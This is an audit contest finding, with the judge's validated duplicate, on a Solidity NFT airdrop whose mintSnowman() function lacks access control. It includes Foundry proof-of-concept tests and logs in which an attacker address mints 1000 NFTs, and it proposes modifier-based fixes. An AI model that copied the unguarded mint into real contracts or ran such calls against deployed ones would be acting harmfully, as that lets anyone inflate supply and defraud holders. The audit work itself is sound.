Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Missing Access Control on mintSnowman() Allows Unlimited NFT Minting

Description

mintSnowman() in Snowman.sol is declared external with no access control modifier and no msg.sender check whatsoever:

function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

By design, this function should only ever be called by the SnowmanAirdrop contract, at the end of claimSnowman(), after a caller has staked Snow tokens, passed Merkle proof verification against the airdrop's committed allocation, and provided a valid EIP-712 signature from the receiver. None of those preconditions are enforced on-chain within Snowman.sol itself — the function trusts that only SnowmanAirdrop will ever call it, but nothing in the code guarantees that.

Risk

Likelihood: High. This requires no special conditions, no timing, no funds, and no interaction with any other part of the protocol. Any external address — including a brand new wallet with zero Snow tokens and zero prior interaction with the protocol — can call mintSnowman() directly on Snowman.sol at any time, since the contract address is public once deployed.

Impact: High. The entire purpose of SnowmanAirdrop.sol is to gate NFT minting behind Merkle-proof-verified, signature-authenticated claims tied to staked Snow token balances — this is the protocol's core value proposition. This missing check bypasses that gate entirely: the amount parameter is also fully attacker-controlled, meaning a single transaction can mint an unbounded number of NFTs (limited only by block gas limit), for any address, for free. This destroys the intended scarcity of Snowman NFTs and makes the Merkle-gated claim flow in SnowmanAirdrop.sol functionally meaningless — any legitimate claim data becomes worthless once anyone can mint arbitrary amounts directly.

Proof of Concept

function test_H1_AnyoneCanMintUnlimitedSnowman() public {
// attacker never staked a single Snow token, never went through
// SnowmanAirdrop, never had a valid Merkle proof or signature
assertEq(snow.balanceOf(attacker), 0);
vm.prank(attacker);
nft.mintSnowman(attacker, 1000);
assertEq(nft.balanceOf(attacker), 1000);
}

Result: PASS. Attacker mints 1000 Snowman NFTs with zero Snow staked and zero interaction with the airdrop contract.

Recommended Mitigation

Restrict mintSnowman() to be callable only by the SnowmanAirdrop contract. Store its address at deployment and gate the function:

address private immutable i_airdrop;
constructor(string memory _svgUri, address _airdrop) ERC721("Snowman Airdrop", "SNOWMAN") {
i_airdrop = _airdrop;
...
}
modifier onlyAirdrop() {
if (msg.sender != i_airdrop) revert SM__NotAllowed();
_;
}
function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {
...
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!